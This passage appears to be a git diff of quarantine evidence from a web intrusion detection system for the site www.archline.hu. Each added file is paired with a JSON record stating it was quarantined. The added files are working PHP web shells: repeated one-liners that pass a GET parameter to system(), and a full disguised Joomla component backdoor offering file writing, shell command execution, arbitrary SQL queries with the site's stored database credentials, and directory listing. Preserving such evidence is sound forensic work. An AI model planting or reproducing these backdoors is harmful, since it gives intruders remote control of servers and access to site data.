(dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_yhdrz7g2.php.json)", + "original_sha256": "e0695052bf49d85145ab86e59750b5930bdef9fbeb9e1d7db491416f1c55b644", + "original_stat": { + "gid": 30037, + "mtime": 1783984846, + "size": 150, + "uid": 20043 + }, + "rel_path": "_h3x_yhdrz7g2.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json b/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json new file mode 100644 index 0000000..6fc575b --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json.evidence.json b/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json.evidence.json new file mode 100644 index 0000000..846d37f --- /dev/null +++ b/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2827", + "log_excerpt": "[quarantine] www.archline.hu:_h3x_znv7fh9d.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/_h3x_znv7fh9d.php.json)", + "original_sha256": "1f41898baa990db755bfb3c877a9aeab02d98eb31d49fe508da9bde84c47239a", + "original_stat": { + "gid": 30037, + "mtime": 1783842128, + "size": 45, + "uid": 20043 + }, + "rel_path": "_h3x_znv7fh9d.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..993ad05 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3392", + "log_excerpt": "[quarantine] www.archline.hu:administrator/cache/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111942, + "size": 74, + "uid": 20043 + }, + "rel_path": "administrator/cache/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..f2ee7f8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3393", + "log_excerpt": "[quarantine] www.archline.hu:administrator/cache/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/cache/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111922, + "size": 74, + "uid": 20043 + }, + "rel_path": "administrator/cache/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..8df09f7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3388", + "log_excerpt": "[quarantine] www.archline.hu:administrator/cache/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111778, + "size": 74, + "uid": 20043 + }, + "rel_path": "administrator/cache/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..fd6c394 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3391", + "log_excerpt": "[quarantine] www.archline.hu:administrator/cache/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/cache/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111758, + "size": 74, + "uid": 20043 + }, + "rel_path": "administrator/cache/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..22ea2d4 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3394", + "log_excerpt": "[quarantine] www.archline.hu:administrator/cache/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111796, + "size": 74, + "uid": 20043 + }, + "rel_path": "administrator/cache/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..4bfd165 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3390", + "log_excerpt": "[quarantine] www.archline.hu:administrator/cache/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/cache/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111777, + "size": 74, + "uid": 20043 + }, + "rel_path": "administrator/cache/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json b/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..2493ddd --- /dev/null +++ b/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3386", + "log_excerpt": "[quarantine] www.archline.hu:administrator/templates/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/administrator/templates/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930722, + "size": 57, + "uid": 20043 + }, + "rel_path": "administrator/templates/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/amwhwyys.php.json b/var/www/hosting/archline.hu/www/amwhwyys.php.json new file mode 100644 index 0000000..982bc2b --- /dev/null +++ b/var/www/hosting/archline.hu/www/amwhwyys.php.json @@ -0,0 +1 @@ +';if(isset($_GET['cmd'])){echo'
';system($_GET['cmd']);echo'
';}echo'';?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/amwhwyys.php.json.evidence.json b/var/www/hosting/archline.hu/www/amwhwyys.php.json.evidence.json new file mode 100644 index 0000000..573acc4 --- /dev/null +++ b/var/www/hosting/archline.hu/www/amwhwyys.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "2897", + "log_excerpt": "[quarantine] www.archline.hu:amwhwyys.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/amwhwyys.php.json)", + "original_sha256": "5f9fadd5d78ebe33acaa6f95602ea8b6ba716fe64dac17a20c259ecd32f2dacb", + "original_stat": { + "gid": 30037, + "mtime": 1784057816, + "size": 146, + "uid": 20043 + }, + "rel_path": "amwhwyys.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json b/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..ffa950a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3113", + "log_excerpt": "[quarantine] www.archline.hu:cache/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930706, + "size": 57, + "uid": 20043 + }, + "rel_path": "cache/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..e76b613 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3122", + "log_excerpt": "[quarantine] www.archline.hu:cache/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111932, + "size": 74, + "uid": 20043 + }, + "rel_path": "cache/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..0292ec7 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3124", + "log_excerpt": "[quarantine] www.archline.hu:cache/r0ps_3tdj3r.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/r0ps_3tdj3r.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111916, + "size": 74, + "uid": 20043 + }, + "rel_path": "cache/r0ps_3tdj3r.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json.evidence.json b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json.evidence.json new file mode 100644 index 0000000..23b93d1 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3112", + "log_excerpt": "[quarantine] www.archline.hu:cache/r0ps_bijdps.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111768, + "size": 74, + "uid": 20043 + }, + "rel_path": "cache/r0ps_bijdps.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json.evidence.json b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json.evidence.json new file mode 100644 index 0000000..c212a5f --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3121", + "log_excerpt": "[quarantine] www.archline.hu:cache/r0ps_bijdps.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/r0ps_bijdps.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111752, + "size": 74, + "uid": 20043 + }, + "rel_path": "cache/r0ps_bijdps.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json.evidence.json b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json.evidence.json new file mode 100644 index 0000000..3e84bfe --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3129", + "log_excerpt": "[quarantine] www.archline.hu:cache/r0ps_qbi8yu.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111787, + "size": 74, + "uid": 20043 + }, + "rel_path": "cache/r0ps_qbi8yu.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json.evidence.json b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json.evidence.json new file mode 100644 index 0000000..f543b46 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3120", + "log_excerpt": "[quarantine] www.archline.hu:cache/r0ps_qbi8yu.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/r0ps_qbi8yu.php.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 30037, + "mtime": 1784111771, + "size": 74, + "uid": 20043 + }, + "rel_path": "cache/r0ps_qbi8yu.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json b/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json new file mode 100644 index 0000000..24c02b8 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json.evidence.json b/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json.evidence.json new file mode 100644 index 0000000..6195b44 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3127", + "log_excerpt": "[quarantine] www.archline.hu:cache/rce_a586ao.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/rce_a586ao.php.json)", + "original_sha256": "9ba4b855f3bf60b7e6bf5678beca5959f76b278e4fbd911434d08c5ba0f17926", + "original_stat": { + "gid": 30037, + "mtime": 1783813004, + "size": 117, + "uid": 20043 + }, + "rel_path": "cache/rce_a586ao.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json b/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json new file mode 100644 index 0000000..c1854f3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json.evidence.json b/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json.evidence.json new file mode 100644 index 0000000..cdf80b3 --- /dev/null +++ b/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "3130", + "log_excerpt": "[quarantine] www.archline.hu:cache/rce_qfaord.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/cache/rce_qfaord.php.json)", + "original_sha256": "eff6ad6424feaa82e756ab3264e8689f6293d56dd50f97e585c9572e2ae4cfaf", + "original_stat": { + "gid": 30037, + "mtime": 1783812908, + "size": 117, + "uid": 20043 + }, + "rel_path": "cache/rce_qfaord.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php b/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php new file mode 100644 index 0000000..cbc35f5 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php @@ -0,0 +1,97 @@ +Create: +
+ +
"; +//saving file +if(isset($_POST['save_file']) && $_POST['save_file']!='' && isset($_POST['file_content']) && isset($_POST['send_create_file']) && $_POST['send_create_file']!='') +{ + //if register_globals is off it addes backslash before quotes. " to \" + $file_content=$_POST['file_content']; + if (get_magic_quotes_gpc()) + { + $file_content=stripslashes($file_content); + } + $f=fopen($_POST['save_file'],"w"); + if(fwrite($f,$file_content)!=FALSE)echo "file saved";else echo "error"; + fclose($f); +} +?> + +Open: +
+ +
"; + + +if(isset($_POST['save_file']) && $_POST['save_file']!='' && isset($_POST['send_open_file']) && $_POST['send_open_file']!='') +{ + $f=file_get_contents($_POST['save_file']); + echo ""; +} + + +if(isset($_POST['cmd']) && $_POST['cmd']!='') +{ + $cmd=str_replace('\\',"",$_POST['cmd']); + exec($_POST['cmd'],$arr,$return_var); + echo "
$cmd
"; + for($i=0;$i"; + } + echo "
"; +} +echo "

command


"; + + +echo "

Q:

+ + +
"; +if(isset($_POST['s'])) +{ + include($_SERVER['DOCUMENT_ROOT'] . "/configuration.php"); + //CONNECTION TO DB CODE WITH USNAME PASS HOST AND NEW HTML-FORMS + echo "your query:".$_POST['q']; + $query=$_POST['q']; + $query=mysql_query($query); + + if(strpos($_POST['q'],"select")===0) + { + echo "
Your query returned ".mysql_num_rows($query)." rows
"; + + $rows=mysql_num_rows($query); + $cols=mysql_num_fields($query); + if($rows>0) + { + $arr=mysql_fetch_array($query); + echo ""; + for($i=0;$i<$rows;$i++) + { + echo ""; + for($j=0;$j<$cols;$j++)echo ""; + echo ""; + $arr=mysql_fetch_array($query); + } + echo "
".$arr[$j]."
"; + } + } +} +?> +
+
+' name='pathway'> + +
+"; +if(isset($_POST['showpath']) && $_POST['showpath']=='show' && isset($_POST['pathway'])) +{ + + echo "$_POST[pathway]
"; + $files=scandir($_POST['pathway']); + for($i=0;$i"; +} +?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php.evidence.json b/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php.evidence.json new file mode 100644 index 0000000..2fe65f0 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4776", + "log_excerpt": "[quarantine] www.archline.hu:components/com_joml_incf/joml_incf.php -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/com_joml_incf/joml_incf.php)", + "original_sha256": "5a2a84f37f564063481c8898748c07ccf3219b0ea7df420de3613affc846e74b", + "original_stat": { + "gid": 30037, + "mtime": 1627260303, + "size": 2899, + "uid": 20043 + }, + "rel_path": "components/com_joml_incf/joml_incf.php", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/i9wliit0.php.json b/var/www/hosting/archline.hu/www/components/i9wliit0.php.json new file mode 100644 index 0000000..4898f61 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/i9wliit0.php.json @@ -0,0 +1 @@ + \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/i9wliit0.php.json.evidence.json b/var/www/hosting/archline.hu/www/components/i9wliit0.php.json.evidence.json new file mode 100644 index 0000000..986c159 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/i9wliit0.php.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4761", + "log_excerpt": "[quarantine] www.archline.hu:components/i9wliit0.php.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/i9wliit0.php.json)", + "original_sha256": "d4833d1399b264d7c64e932658c19246d5fd6aedee2233ed0faf4bb8d257004a", + "original_stat": { + "gid": 30037, + "mtime": 1783930728, + "size": 57, + "uid": 20043 + }, + "rel_path": "components/i9wliit0.php.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json.evidence.json b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json.evidence.json new file mode 100644 index 0000000..1c7fa28 --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json.evidence.json @@ -0,0 +1,15 @@ +{ + "finding_ref": "4767", + "log_excerpt": "[quarantine] www.archline.hu:components/r0ps_3tdj3r.json -> quarantined (dest=/var/lib/web-hids/quarantine/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.json)", + "original_sha256": "c4f98f6b5ad296b1afc90555d87c98d9d6b994784f0fcfcf79f248ec62bc6d3a", + "original_stat": { + "gid": 0, + "mtime": 1784111937, + "size": 74, + "uid": 20043 + }, + "rel_path": "components/r0ps_3tdj3r.json", + "result": "quarantined", + "timestamp": "20260718T160241Z", + "vhost": "www.archline.hu" +} diff --git a/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json new file mode 100644 index 0000000..94fbd9a --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json @@ -0,0 +1 @@ +".php_uname()."\n"; system($_GET["c"]); echo ""; ?> \ No newline at end of file diff --git a/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json.evidence.json b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json.evidence.json new file mode 100644 index 0000000..a00c2ed --- /dev/null +++ b/var/www/hosting/archline.hu/www/components/r0ps_3tdj3r.php.json.evidence.json 